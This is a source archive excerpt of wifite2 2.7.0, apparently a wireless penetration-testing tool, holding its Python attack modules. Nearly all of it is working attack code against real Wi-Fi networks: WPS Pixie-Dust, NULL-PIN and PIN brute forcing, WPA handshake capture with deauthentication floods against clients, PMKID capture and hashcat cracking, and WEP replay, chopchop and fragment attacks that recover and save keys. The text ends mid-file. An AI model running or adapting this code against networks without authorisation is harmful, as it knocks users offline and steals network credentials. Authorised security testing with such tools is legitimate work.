wifite2-2.7.0/0000755000175000017500000000000014437644461012446 5ustar sophiesophiewifite2-2.7.0/wifite/0000755000175000017500000000000014437644461013735 5ustar sophiesophiewifite2-2.7.0/wifite/attack/0000755000175000017500000000000014437644461015204 5ustar sophiesophiewifite2-2.7.0/wifite/attack/all.py0000755000175000017500000001456214437644461016341 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from .pmkid import AttackPMKID from .wep import AttackWEP from .wpa import AttackWPA from .wps import AttackWPS from ..config import Configuration from ..model.target import WPSState from ..util.color import Color class AttackAll(object): @classmethod def attack_multiple(cls, targets): """ Attacks all given `targets` (list[wifite.model.target]) until user interruption. Returns: Number of targets that were attacked (int) """ if any(t.wps for t in targets) and not AttackWPS.can_attack_wps(): # Warn that WPS attacks are not available. Color.pl('{!} {O}Note: WPS attacks are not possible because you do not have {C}reaver{O} nor {C}bully{W}') attacked_targets = 0 targets_remaining = len(targets) for index, target in enumerate(targets, start=1): if Configuration.attack_max != 0 and index > Configuration.attack_max: print(("Attacked %d targets, stopping because of the --first flag" % Configuration.attack_max)) break attacked_targets += 1 targets_remaining -= 1 bssid = target.bssid essid = target.essid if target.essid_known else '{O}ESSID unknown{W}' Color.pl('\n{+} ({G}%d{W}/{G}%d{W})' % (index, len(targets)) + ' Starting attacks against {C}%s{W} ({C}%s{W})' % (bssid, essid)) should_continue = cls.attack_single(target, targets_remaining) if not should_continue: break return attacked_targets @classmethod def attack_single(cls, target, targets_remaining): """ Attacks a single `target` (wifite.model.target). Returns: True if attacks should continue, False otherwise. """ global attack if 'MGT' in target.authentication: Color.pl("\n{!}{O}Skipping. Target is using {C}WPA-Enterprise {O}and can not be cracked.") return True attacks = [] if Configuration.use_eviltwin: # TODO: EvilTwin attack pass elif 'WEP' in target.encryption: attacks.append(AttackWEP(target)) elif 'WPA' in target.encryption: # WPA can have multiple attack vectors: # WPS if not Configuration.use_pmkid_only and target.wps is WPSState.UNLOCKED and AttackWPS.can_attack_wps(): # Pixie-Dust if Configuration.wps_pixie: attacks.append(AttackWPS(target, pixie_dust=True)) # Null PIN zero-day attack if Configuration.wps_pin: attacks.append(AttackWPS(target, pixie_dust=False, null_pin=True)) # PIN attack if Configuration.wps_pin: attacks.append(AttackWPS(target, pixie_dust=False)) if not Configuration.wps_only: # PMKID attacks.append(AttackPMKID(target)) # Handshake capture if not Configuration.use_pmkid_only: attacks.append(AttackWPA(target)) if not attacks: Color.pl('{!} {R}Error: {O}Unable to attack: no attacks available') return True # Keep attacking other targets (skip) while attacks: # Needed by infinite attack mode in order to count how many targets were attacked target.attacked = True attack = attacks.pop(0) try: result = attack.run() if result: break # Attack was successful, stop other attacks. except Exception as e: # TODO:kimocoder: below is a great way to handle Exception # rather then running full traceback in run of parsing to console. Color.pl('\r {!} {R}Error{W}: %s' % str(e)) #Color.pexception(e) # This was the original one which parses full traceback #Color.pl('\n{!} {R}Exiting{W}\n') # Another great one for other uasages. continue except KeyboardInterrupt: Color.pl('\n{!} {O}Interrupted{W}\n') answer = cls.user_wants_to_continue(targets_remaining, len(attacks)) if answer is True: continue # Keep attacking the same target (continue) elif answer is None: return True # Keep attacking other targets (skip) else: return False # Stop all attacks (exit) if attack.success: attack.crack_result.save() return True # Keep attacking other targets @classmethod def user_wants_to_continue(cls, targets_remaining, attacks_remaining=0): """ Asks user if attacks should continue onto other targets Returns: None if the user wants to skip the current target True if the user wants to continue to the next attack on the current target False if the user wants to stop the remaining attacks """ if attacks_remaining == 0 and targets_remaining == 0: return # No targets or attacksleft, drop out prompt_list = [] if attacks_remaining > 0: prompt_list.append(Color.s('{C}%d{W} attack(s)' % attacks_remaining)) if targets_remaining > 0: prompt_list.append(Color.s('{C}%d{W} target(s)' % targets_remaining)) prompt = ' and '.join(prompt_list) + ' remain' Color.pl('{+} %s' % prompt) prompt = '{+} Do you want to' options = '(' if attacks_remaining > 0: prompt += ' {G}continue{W} attacking,' options += '{G}c{W}{D}, {W}' if targets_remaining > 0: prompt += ' {O}skip{W} to the next target,' options += '{O}s{W}{D}, {W}' if Configuration.infinite_mode: options += '{R}r{W})' prompt += ' or {R}return{W} to scanning %s? {C}' % options else: options += '{R}e{W})' prompt += ' or {R}exit{W} %s? {C}' % options Color.p(prompt) answer = input().lower() if answer.startswith('s'): return None # Skip elif answer.startswith('e') or answer.startswith('r'): return False # Exit/Return else: return True # Continue wifite2-2.7.0/wifite/attack/__init__.py0000755000175000017500000000000014437644461017306 0ustar sophiesophiewifite2-2.7.0/wifite/attack/wps.py0000755000175000017500000000650614437644461016401 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..model.attack import Attack from ..util.color import Color from ..config import Configuration from ..tools.bully import Bully from ..tools.reaver import Reaver class AttackWPS(Attack): @staticmethod def can_attack_wps(): return Reaver.exists() or Bully.exists() def __init__(self, target, pixie_dust=False, null_pin=False): super(AttackWPS, self).__init__(target) self.success = False self.crack_result = None self.pixie_dust = pixie_dust self.null_pin = null_pin def run(self): """ Run all WPS-related attacks """ # Drop out if user specified to not use Reaver/Bully if Configuration.use_pmkid_only: self.success = False return False if Configuration.no_wps: self.success = False return False if not Configuration.wps_pixie and self.pixie_dust: return self._extracted_from_run_14( '\r{!} {O}--no-pixie{R} was given, ignoring WPS Pixie-Dust Attack on {O}%s{W}' ) if not Configuration.wps_no_nullpin and self.null_pin: #Color.pl('\r{!} {O}--no-nullpin{R} was given, ignoring WPS NULLPIN Attack on {O}%s{W}' % self.target.essid) self.success = False return False if not Configuration.wps_pin and not self.pixie_dust: return self._extracted_from_run_14( '\r{!} {O}--pixie{R} was given, ignoring WPS PIN Attack on {O}%s{W}' ) if not Reaver.exists() and Bully.exists(): # Use bully if reaver isn't available return self.run_bully() elif self.pixie_dust and not Reaver.is_pixiedust_supported() and Bully.exists(): # Use bully if reaver can't do pixie-dust return self.run_bully() elif Configuration.use_bully: # Use bully if asked by user return self.run_bully() elif not Reaver.exists(): # Print error if reaver isn't found (bully not available) if self.pixie_dust: Color.pl('\r{!} {R}Skipping WPS Pixie-Dust attack: {O}reaver{R} not found.{W}') else: Color.pl('\r{!} {R}Skipping WPS PIN attack: {O}reaver{R} not found.{W}') return False elif self.pixie_dust and not Reaver.is_pixiedust_supported(): # Print error if reaver can't support pixie-dust (bully not available) Color.pl('\r{!} {R}Skipping WPS attack: {O}reaver{R} does not support {O}--pixie-dust{W}') return False else: return self.run_reaver() # TODO Rename this here and in `run` def _extracted_from_run_14(self, arg0): Color.pl(arg0 % self.target.essid) self.success = False return False def run_bully(self): bully = Bully(self.target, pixie_dust=self.pixie_dust) bully.run() bully.stop() self.crack_result = bully.crack_result self.success = self.crack_result is not None return self.success def run_reaver(self): reaver = Reaver(self.target, pixie_dust=self.pixie_dust, null_pin=self.null_pin) reaver.run() self.crack_result = reaver.crack_result self.success = self.crack_result is not None return self.success wifite2-2.7.0/wifite/attack/wpa.py0000755000175000017500000002547514437644461016365 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..model.attack import Attack from ..tools.aircrack import Aircrack from ..tools.airodump import Airodump from ..tools.aireplay import Aireplay from ..config import Configuration from ..util.color import Color from ..util.timer import Timer from ..model.handshake import Handshake from ..model.wpa_result import CrackResultWPA import time import os import re from shutil import copy class AttackWPA(Attack): def __init__(self, target): super(AttackWPA, self).__init__(target) self.clients = [] self.crack_result = None self.success = False def run(self): """Initiates full WPA handshake capture attack.""" # Skip if target is not WPS if Configuration.wps_only and self.target.wps is False: Color.pl('\r{!} {O}Skipping WPA-Handshake attack on {R}%s{O} because {R}--wps-only{O} is set{W}' % self.target.essid) self.success = False return self.success # Skip if user only wants to run PMKID attack if Configuration.use_pmkid_only: self.success = False return False # Capture the handshake (or use an old one) handshake = self.capture_handshake() if handshake is None: # Failed to capture handshake self.success = False return self.success # Analyze handshake Color.pl('\n{+} analysis of captured handshake file:') handshake.analyze() # Check for the --skip-crack flag if Configuration.skip_crack: return self._extracted_from_run_30( '{+} Not cracking handshake because {C}skip-crack{W} was used{W}' ) # Check wordlist if Configuration.wordlist is None: return self._extracted_from_run_30( '{!} {O}Not cracking handshake because wordlist ({R}--dict{O}) is not set' ) elif not os.path.exists(Configuration.wordlist): Color.pl('{!} {O}Not cracking handshake because wordlist {R}%s{O} was not found' % Configuration.wordlist) self.success = False return False Color.pl('\n{+} {C}Cracking WPA Handshake:{W} Running {C}aircrack-ng{W} with ' '{C}%s{W} wordlist' % os.path.split(Configuration.wordlist)[-1]) # Crack it key = Aircrack.crack_handshake(handshake, show_command=False) if key is None: Color.pl('{!} {R}Failed to crack handshake: {O}%s{R} did not contain password{W}' % Configuration.wordlist.split(os.sep)[-1]) self.success = False else: Color.pl('{+} {G}Cracked WPA Handshake{W} PSK: {G}%s{W}\n' % key) self.crack_result = CrackResultWPA(handshake.bssid, handshake.essid, handshake.capfile, key) self.crack_result.dump() self.success = True return self.success # TODO Rename this here and in `run` def _extracted_from_run_30(self, arg0): Color.pl(arg0) self.success = False return False def capture_handshake(self): """Returns captured or stored handshake, otherwise None.""" handshake = None # First, start Airodump process with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, skip_wps=True, output_file_prefix='wpa') as airodump: Color.clear_entire_line() Color.pattack('WPA', self.target, 'Handshake capture', 'Waiting for target to appear...') airodump_target = self.wait_for_target(airodump) self.clients = [] # Try to load existing handshake if not Configuration.ignore_old_handshakes: bssid = airodump_target.bssid essid = airodump_target.essid if airodump_target.essid_known else None handshake = self.load_handshake(bssid=bssid, essid=essid) if handshake: Color.pattack('WPA', self.target, 'Handshake capture', 'found {G}existing handshake{W} for {C}%s{W}' % handshake.essid) Color.pl('\n{+} Using handshake from {C}%s{W}' % handshake.capfile) return handshake timeout_timer = Timer(Configuration.wpa_attack_timeout) deauth_timer = Timer(Configuration.wpa_deauth_timeout) while handshake is None and not timeout_timer.ended(): step_timer = Timer(1) Color.clear_entire_line() Color.pattack('WPA', airodump_target, 'Handshake capture', 'Listening. (clients:{G}%d{W}, deauth:{O}%s{W}, timeout:{R}%s{W})' % ( len(self.clients), deauth_timer, timeout_timer)) # Find .cap file cap_files = airodump.find_files(endswith='.cap') if len(cap_files) == 0: # No cap files yet time.sleep(step_timer.remaining()) continue cap_file = cap_files[0] # Copy .cap file to temp for consistency temp_file = Configuration.temp('handshake.cap.bak') copy(cap_file, temp_file) # Check cap file in temp for Handshake bssid = airodump_target.bssid essid = airodump_target.essid if airodump_target.essid_known else None handshake = Handshake(temp_file, bssid=bssid, essid=essid) if handshake.has_handshake(): # We got a handshake Color.clear_entire_line() Color.pattack('WPA', airodump_target, 'Handshake capture', '{G}Captured handshake{W}') Color.pl('') break # There is no handshake handshake = None # Delete copied .cap file in temp to save space os.remove(temp_file) # Look for new clients airodump_target = self.wait_for_target(airodump) for client in airodump_target.clients: if client.station not in self.clients: Color.clear_entire_line() Color.pattack('WPA', airodump_target, 'Handshake capture', 'Discovered new client: {G}%s{W}' % client.station) Color.pl('') self.clients.append(client.station) # Send deauth to a client or broadcast if deauth_timer.ended(): self.deauth(airodump_target) # Restart timer deauth_timer = Timer(Configuration.wpa_deauth_timeout) # Sleep for at-most 1 second time.sleep(step_timer.remaining()) continue # Handshake listen+deauth loop if handshake is None: # No handshake, attack failed. Color.pl('\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds' % ( Configuration.wpa_attack_timeout)) else: # Save copy of handshake to ./hs/ self.save_handshake(handshake) return handshake @staticmethod def load_handshake(bssid, essid): if not os.path.exists(Configuration.wpa_handshake_dir): return None if essid: essid_safe = re.escape(re.sub('[^a-zA-Z\d]', '', essid)) else: essid_safe = '[a-zA-Z0-9]+' bssid_safe = re.escape(bssid.replace(':', '-')) date = r'\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2}' get_filename = re.compile(r'handshake_%s_%s_%s\.cap' % (essid_safe, bssid_safe, date)) for filename in os.listdir(Configuration.wpa_handshake_dir): cap_filename = os.path.join(Configuration.wpa_handshake_dir, filename) if os.path.isfile(cap_filename) and re.match(get_filename, filename): return Handshake(capfile=cap_filename, bssid=bssid, essid=essid) return None @staticmethod def save_handshake(handshake): """ Saves a copy of the handshake file to hs/ Args: handshake - Instance of Handshake containing bssid, essid, capfile """ # Create handshake dir if not os.path.exists(Configuration.wpa_handshake_dir): os.makedirs(Configuration.wpa_handshake_dir) # Generate filesystem-safe filename from bssid, essid and date if handshake.essid and type(handshake.essid) is str: essid_safe = re.sub('[^a-zA-Z\d]', '', handshake.essid) else: essid_safe = 'UnknownEssid' bssid_safe = handshake.bssid.replace(':', '-') date = time.strftime('%Y-%m-%dT%H-%M-%S') cap_filename = f'handshake_{essid_safe}_{bssid_safe}_{date}.cap' cap_filename = os.path.join(Configuration.wpa_handshake_dir, cap_filename) if Configuration.wpa_strip_handshake: Color.p('{+} {C}stripping{W} non-handshake packets, saving to {G}%s{W}...' % cap_filename) handshake.strip(outfile=cap_filename) else: Color.p('{+} saving copy of {C}handshake{W} to {C}%s{W} ' % cap_filename) copy(handshake.capfile, cap_filename) Color.pl('{G}saved{W}') # Update handshake to use the stored handshake file for future operations handshake.capfile = cap_filename def deauth(self, target): """ Sends deauthentication request to broadcast and every client of target. Args: target - The Target to deauth, including clients. """ if Configuration.no_deauth: return for client in [None] + self.clients: target_name = '*broadcast*' if client is None else client Color.clear_entire_line() Color.pattack('WPA', target, 'Handshake capture', 'Deauthing {O}%s{W}' % target_name) Aireplay.deauth(target.bssid, client_mac=client, timeout=2) if __name__ == '__main__': Configuration.initialize(True) from ..model.target import Target fields = 'A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 11, 54e,WPA, WPA, , -58, 2' \ ', 0, 0. 0. 0. 0, 9, Test Router Please Ignore, '.split(',') target = Target(fields) wpa = AttackWPA(target) try: wpa.run() except KeyboardInterrupt: Color.pl('') Configuration.exit_gracefully(0) wifite2-2.7.0/wifite/attack/pmkid.py0000755000175000017500000003314614437644461016674 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- from ..model.attack import Attack from ..config import Configuration from ..tools.hashcat import HcxDumpTool, HcxPcapngTool, Hashcat from ..util.color import Color from ..util.timer import Timer from ..model.pmkid_result import CrackResultPMKID from ..tools.airodump import Airodump from threading import Thread import os import time import re from shutil import copy class AttackPMKID(Attack): def __init__(self, target): super(AttackPMKID, self).__init__(target) self.crack_result = None self.do_airCRACK = False self.keep_capturing = None self.pcapng_file = Configuration.temp('pmkid.pcapng') self.success = False self.timer = None @staticmethod def get_existing_pmkid_file(bssid): """ Load PMKID Hash from a previously-captured hash in ./hs/ Returns: The hashcat hash (hash*bssid*station*essid) if found. None if not found. """ if not os.path.exists(Configuration.wpa_handshake_dir): return None bssid = bssid.lower().replace(':', '') file_re = re.compile(r'.*pmkid_.*\.22000') for filename in os.listdir(Configuration.wpa_handshake_dir): pmkid_filename = os.path.join(Configuration.wpa_handshake_dir, filename) if not os.path.isfile(pmkid_filename): continue if not re.match(file_re, pmkid_filename): continue with open(pmkid_filename, 'r') as pmkid_handle: pmkid_hash = pmkid_handle.read().strip() if pmkid_hash.count('*') < 3: continue existing_bssid = pmkid_hash.split('*')[1].lower().replace(':', '') if existing_bssid == bssid: return pmkid_filename return None def run_hashcat(self): """ Performs PMKID attack, if possible. 1) Captures PMKID hash (or re-uses existing hash if found). 2) Cracks the hash. Returns: True if handshake is captured. False otherwise. """ # Skip if user doesn't want to run PMKID attack if Configuration.dont_use_pmkid: self.success = False return False from ..util.process import Process # Check that we have all hashcat programs dependencies = [ HcxDumpTool.dependency_name, HcxPcapngTool.dependency_name ] if missing_deps := [dep for dep in dependencies if not Process.exists(dep)]: Color.pl('{!} Skipping PMKID attack, missing required tools: {O}%s{W}' % ', '.join(missing_deps)) return False pmkid_file = None if not Configuration.ignore_old_handshakes: # Load exisitng PMKID hash from filesystem pmkid_file = self.get_existing_pmkid_file(self.target.bssid) if pmkid_file is not None: Color.pattack('PMKID', self.target, 'CAPTURE', 'Loaded {C}existing{W} PMKID hash: {C}%s{W}\n' % pmkid_file) if pmkid_file is None: # Capture hash from live target. pmkid_file = self.capture_pmkid() if pmkid_file is None: return False # No hash found. # Check for the --skip-crack flag if Configuration.skip_crack: return self._extracted_from_run_hashcat_44( '{+} Not cracking pmkid because {C}skip-crack{W} was used{W}' ) # Crack it. if Process.exists(Hashcat.dependency_name): try: self.success = self.crack_pmkid_file(pmkid_file) except KeyboardInterrupt: return self._extracted_from_run_hashcat_44( '\n{!} {R}Failed to crack PMKID: {O}Cracking interrupted by user{W}' ) else: self.success = False Color.pl('\n {O}[{R}!{O}] Note: PMKID attacks are not possible because you do not have {C}%s{O}.{W}' % Hashcat.dependency_name) return True # Even if we don't crack it, capturing a PMKID is 'successful' # TODO Rename this here and in `run_hashcat` def _extracted_from_run_hashcat_44(self, arg0): Color.pl(arg0) self.success = False return True def run(self): if self.do_airCRACK: self.run_aircrack() else: self.run_hashcat() def run_aircrack(self): with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, skip_wps=True, output_file_prefix='wpa') as airodump: Color.clear_entire_line() Color.pattack('WPA', self.target, 'PMKID capture', 'Waiting for target to appear...') airodump_target = self.wait_for_target(airodump) # # Try to load existing handshake # if Configuration.ignore_old_handshakes == False: # bssid = airodump_target.bssid # essid = airodump_target.essid if airodump_target.essid_known else None # handshake = self.load_handshake(bssid=bssid, essid=essid) # if handshake: # Color.pattack('WPA', self.target, 'Handshake capture', # 'found {G}existing handshake{W} for {C}%s{W}' % handshake.essid) # Color.pl('\n{+} Using handshake from {C}%s{W}' % handshake.capfile) # return handshake timeout_timer = Timer(Configuration.wpa_attack_timeout) while not timeout_timer.ended(): step_timer = Timer(1) Color.clear_entire_line() Color.pattack('WPA', airodump_target, 'Handshake capture', 'Listening. (clients:{G}{W}, deauth:{O}{W}, timeout:{R}%s{W})' % timeout_timer) # Find .cap file cap_files = airodump.find_files(endswith='.cap') if len(cap_files) == 0: # No cap files yet time.sleep(step_timer.remaining()) continue cap_file = cap_files[0] # Copy .cap file to temp for consistency temp_file = Configuration.temp('handshake.cap.bak') copy(cap_file, temp_file) # Check cap file in temp for Handshake # bssid = airodump_target.bssid # essid = airodump_target.essid if airodump_target.essid_known else None # AttackPMKID.check_pmkid(temp_file, self.target.bssid) if self.check_pmkid(temp_file): # We got a handshake Color.clear_entire_line() Color.pattack('WPA', airodump_target, 'PMKID capture', '{G}Captured PMKID{W}') Color.pl('') capture = temp_file break # There is no handshake capture = None # Delete copied .cap file in temp to save space os.remove(temp_file) # # Look for new clients # airodump_target = self.wait_for_target(airodump) # for client in airodump_target.clients: # if client.station not in self.clients: # Color.clear_entire_line() # Color.pattack('WPA', # airodump_target, # 'Handshake capture', # 'Discovered new client: {G}%s{W}' % client.station) # Color.pl('') # self.clients.append(client.station) # # Send deauth to a client or broadcast # if deauth_timer.ended(): # self.deauth(airodump_target) # # Restart timer # deauth_timer = Timer(Configuration.wpa_deauth_timeout) # # Sleep for at-most 1 second time.sleep(step_timer.remaining()) # continue # Handshake listen+deauth loop if capture is None: # No handshake, attack failed. Color.pl('\n{!} {O}WPA handshake capture {R}FAILED:{O} Timed out after %d seconds' % ( Configuration.wpa_attack_timeout)) self.success = False else: # Save copy of handshake to ./hs/ self.success = False self.save_pmkid(capture) return self.success def check_pmkid(self, filename): """Returns tuple (BSSID,None) if aircrack thinks self.capfile contains a handshake / can be cracked""" from ..util.process import Process command = f'aircrack-ng "{filename}"' (stdout, stderr) = Process.call(command) return any('with PMKID' in line and self.target.bssid in line for line in stdout.split("\n")) def capture_pmkid(self): """ Runs hashcat's hcxpcapngtool to extract PMKID hash from the .pcapng file. Returns: The PMKID hash (str) if found, otherwise None. """ self.keep_capturing = True self.timer = Timer(Configuration.pmkid_timeout) # Start hcxdumptool t = Thread(target=self.dumptool_thread) t.start() # Repeatedly run pcaptool & check output for hash for self.target.essid pmkid_hash = None pcaptool = HcxPcapngTool(self.target) while self.timer.remaining() > 0: pmkid_hash = pcaptool.get_pmkid_hash(self.pcapng_file) if pmkid_hash is not None: break # Got PMKID Color.pattack('PMKID', self.target, 'CAPTURE', 'Waiting for PMKID ({C}%s{W})' % str(self.timer)) time.sleep(1) self.keep_capturing = False if pmkid_hash is None: Color.pattack('PMKID', self.target, 'CAPTURE', '{R}Failed{O} to capture PMKID\n') Color.pl('') return None # No hash found. Color.clear_entire_line() Color.pattack('PMKID', self.target, 'CAPTURE', '{G}Captured PMKID{W}') return self.save_pmkid(pmkid_hash) def crack_pmkid_file(self, pmkid_file): """ Runs hashcat containing PMKID hash (*.22000). If cracked, saves results in self.crack_result Returns: True if cracked, False otherwise. """ # Check that wordlist exists before cracking. if Configuration.wordlist is None: Color.pl('\n{!} {O}Not cracking PMKID because there is no {R}wordlist{O} (re-run with {C}--dict{O})') # TODO: Uncomment once --crack is updated to support recracking PMKIDs. # Color.pl('{!} {O}Run Wifite with the {R}--crack{O} and {R}--dict{O} options to try again.') key = None else: Color.clear_entire_line() Color.pattack('PMKID', self.target, 'CRACK', 'Cracking PMKID using {C}%s{W} ...\n' % Configuration.wordlist) key = Hashcat.crack_pmkid(pmkid_file) if key is not None: return self._extracted_from_crack_pmkid_file_31(key, pmkid_file) # Failed to crack. if Configuration.wordlist is not None: Color.clear_entire_line() Color.pattack('PMKID', self.target, '{R}CRACK', '{R}Failed {O}Passphrase not found in dictionary.\n') return False # TODO Rename this here and in `crack_pmkid_file` def _extracted_from_crack_pmkid_file_31(self, key, pmkid_file): # Successfully cracked. Color.clear_entire_line() Color.pattack('PMKID', self.target, 'CRACKED', '{C}Key: {G}%s{W}' % key) self.crack_result = CrackResultPMKID(self.target.bssid, self.target.essid, pmkid_file, key) Color.pl('\n') self.crack_result.dump() return True def dumptool_thread(self): """Runs hashcat's hcxdumptool until it dies or `keep_capturing == False`""" dumptool = HcxDumpTool(self.target, self.pcapng_file) # Let the dump tool run until we have the hash. while self.keep_capturing and dumptool.poll() is None: time.sleep(0.5) dumptool.interrupt() def save_pmkid(self, pmkid_hash): """Saves a copy of the pmkid (handshake) to hs/ directory.""" # Create handshake dir if self.do_airCRACK: return self._extracted_from_save_pmkid_6(pmkid_hash) if not os.path.exists(Configuration.wpa_handshake_dir): os.makedirs(Configuration.wpa_handshake_dir) pmkid_file = self._extracted_from_save_pmkid_21('.22000') with open(pmkid_file, 'w') as pmkid_handle: pmkid_handle.write(pmkid_hash) pmkid_handle.write('\n') return pmkid_file # TODO Rename this here and in `save_pmkid` def _extracted_from_save_pmkid_21(self, arg0): # Generate filesystem-safe filename from bssid, essid and date essid_safe = re.sub('[^a-zA-Z\d]', '', self.target.essid) bssid_safe = self.target.bssid.replace(':', '-') date = time.strftime('%Y-%m-%dT%H-%M-%S') result = f'pmkid_{essid_safe}_{bssid_safe}_{date}{arg0}' result = os.path.join(Configuration.wpa_handshake_dir, result) Color.p('\n{+} Saving copy of {C}PMKID Hash{W} to {C}%s{W} ' % result) return result # TODO Rename this here and in `save_pmkid` def _extracted_from_save_pmkid_6(self, pmkid_hash): pmkid_file = self._extracted_from_save_pmkid_21('.cap') copy(pmkid_hash, pmkid_file) return pmkid_file wifite2-2.7.0/wifite/attack/wep.py0000755000175000017500000004117514437644461016364 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import time from ..config import Configuration from ..model.attack import Attack from ..model.wep_result import CrackResultWEP from ..tools.aircrack import Aircrack from ..tools.aireplay import Aireplay, WEPAttackType from ..tools.airodump import Airodump from ..tools.ip import Ip from ..util.color import Color class AttackWEP(Attack): """ Contains logic for attacking a WEP-encrypted access point. """ fakeauth_wait = 5 # TODO: Configuration? def __init__(self, target): super(AttackWEP, self).__init__(target) self.crack_result = None self.success = False def run(self): """ Initiates full WEP attack. Including airodump-ng starting, cracking, etc. Returns: True if attack is successful, false otherwise """ aircrack = None # Aircrack process, not started yet fakeauth_proc = None replay_file = None airodump_target = None previous_ivs = 0 current_ivs = 0 total_ivs = 0 keep_ivs = Configuration.wep_keep_ivs # Clean up previous WEP sessions if keep_ivs: Airodump.delete_airodump_temp_files('wep') attacks_remaining = list(Configuration.wep_attacks) while attacks_remaining: attack_name = attacks_remaining.pop(0) # BIG try-catch to capture ctrl+c try: # Start Airodump process with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, ivs_only=True, # Only capture IVs packets skip_wps=True, # Don't check for WPS-compatibility output_file_prefix='wep', delete_existing_files=not keep_ivs) as airodump: Color.clear_line() Color.p('\r{+} {O}waiting{W} for target to appear...') airodump_target = self.wait_for_target(airodump) fakeauth_proc = None if self.fake_auth(): # We successfully authenticated! # Use our interface's MAC address for the attacks. client_mac = Ip.get_mac(Configuration.interface) # Keep us authenticated fakeauth_proc = Aireplay(self.target, 'fakeauth') elif len(airodump_target.clients) == 0: # Failed to fakeauth, can't use our MAC. # And there are no associated clients. Use one and tell the user. Color.pl('{!} {O}there are no associated clients{W}') Color.pl('{!} {R}WARNING: {O}many attacks will not succeed ' 'without fake-authentication or associated clients{W}') client_mac = None else: # Fakeauth failed, but we can re-use an existing client client_mac = airodump_target.clients[0].station # Convert to WEPAttackType. wep_attack_type = WEPAttackType(attack_name) # Start Aireplay process. aireplay = Aireplay(self.target, wep_attack_type, client_mac=client_mac, replay_file=replay_file) time_unchanged_ivs = time.time() # Timestamp when IVs last changed last_ivs_count = 0 # Loop until attack completes. while True: airodump_target = self.wait_for_target(airodump) if client_mac is None and len(airodump_target.clients) > 0: client_mac = airodump_target.clients[0].station if keep_ivs and current_ivs > airodump_target.ivs: # We now have less IVS than before; A new attack must have started. # Track how many we have in-total. previous_ivs += total_ivs current_ivs = airodump_target.ivs total_ivs = previous_ivs + current_ivs status = '%d/{C}%d{W} IVs' % (total_ivs, Configuration.wep_crack_at_ivs) if fakeauth_proc: status += ', {G}fakeauth{W}' if fakeauth_proc.status else ', {R}no-auth{W}' if aireplay.status is not None: status += f', {aireplay.status}' Color.clear_entire_line() Color.pattack('WEP', airodump_target, f'{attack_name}', status) # Check if we cracked it. if aircrack and aircrack.is_cracked(): (hex_key, ascii_key) = aircrack.get_key_hex_ascii() # bssid = airodump_target.bssid # if airodump_target.essid_known: # essid = airodump_target.essid # else: # essid = None Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n' % attack_name) if aireplay: aireplay.stop() if fakeauth_proc: fakeauth_proc.stop() self.crack_result = CrackResultWEP(self.target.bssid, self.target.essid, hex_key, ascii_key) self.crack_result.dump() Airodump.delete_airodump_temp_files('wep') self.success = True return self.success if aircrack and aircrack.is_running(): # Aircrack is running in the background. Color.p('and {C}cracking{W}') # Check number of IVs, crack if necessary if total_ivs > Configuration.wep_crack_at_ivs: if not aircrack or not aircrack.is_running(): # Aircrack hasn't started yet. Start it. ivs_files = airodump.find_files(endswith='.ivs') ivs_files.sort() if len(ivs_files) > 0: if not keep_ivs: ivs_files = ivs_files[-1] # Use most-recent .ivs file aircrack = Aircrack(ivs_files) elif 0 < Configuration.wep_restart_aircrack < aircrack.pid.running_time(): # Restart aircrack after X seconds Color.pl('\n{+} {C}aircrack{W} ran for more than { # C}%d{W} seconds, restarting' % Configuration.wep_restart_aircrack) aircrack.stop() ivs_files = airodump.find_files(endswith='.ivs') ivs_files.sort() if len(ivs_files) > 0: if not keep_ivs: ivs_files = ivs_files[-1] # Use most-recent .ivs file aircrack = Aircrack(ivs_files) if not aireplay.is_running(): # Some Aireplay attacks loop infinitely if attack_name in ['chopchop', 'fragment']: # We expect these to stop once a .xor is created, or if the process failed. replay_file = None # Check for .xor file. xor_file = Aireplay.get_xor() if not xor_file: # If .xor is not there, the process failed. Color.pl('\n{!} {O}%s attack{R} did not generate a .xor file' % attack_name) # XXX: For debugging Color.pl('{?} {O}Command: {R}%s{W}' % ' '.join(aireplay.cmd)) Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output()) break # If .xor exists, run packetforge-ng to create .cap Color.pl( '\n{+} {C}%s attack{W}' % attack_name + ' generated a {C}.xor file{W}, {G}forging...{W}') replay_file = Aireplay.forge_packet(xor_file, airodump_target.bssid, client_mac) if not replay_file: # Failed to forge packet. drop out break Color.pl('{+} {C}forged packet{W}, {G}replaying...{W}') wep_attack_type = WEPAttackType('forgedreplay') attack_name = 'forgedreplay' aireplay = Aireplay(self.target, 'forgedreplay', client_mac=client_mac, replay_file=replay_file) time_unchanged_ivs = time.time() # Reset unchanged IVs time (it may have taken a # while to forge the packet) continue else: Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}') Color.pl('{?} {O}Command: {R}%s{W}' % ' '.join(aireplay.cmd)) Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output()) break # Continue to other attacks # Check if IVs stopped flowing (same for > N seconds) if airodump_target.ivs > last_ivs_count: time_unchanged_ivs = time.time() elif Configuration.wep_restart_stale_ivs > 0 and \ attack_name != 'chopchop' and \ attack_name != 'fragment': stale_seconds = time.time() - time_unchanged_ivs if stale_seconds > Configuration.wep_restart_stale_ivs: # No new IVs within threshold, restart aireplay aireplay.stop() Color.pl('\n{!} Restarting {C}aireplay{W} after {C}%d{W} seconds of no new IVs' % stale_seconds) aireplay = Aireplay(self.target, wep_attack_type, client_mac=client_mac, replay_file=replay_file) time_unchanged_ivs = time.time() last_ivs_count = airodump_target.ivs time.sleep(1) continue # End of big while loop # End of with-airodump except KeyboardInterrupt: if fakeauth_proc: fakeauth_proc.stop() if not attacks_remaining: if keep_ivs: Airodump.delete_airodump_temp_files('wep') self.success = False return self.success if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target): if keep_ivs: Airodump.delete_airodump_temp_files('wep') self.success = False return self.success except Exception as e: 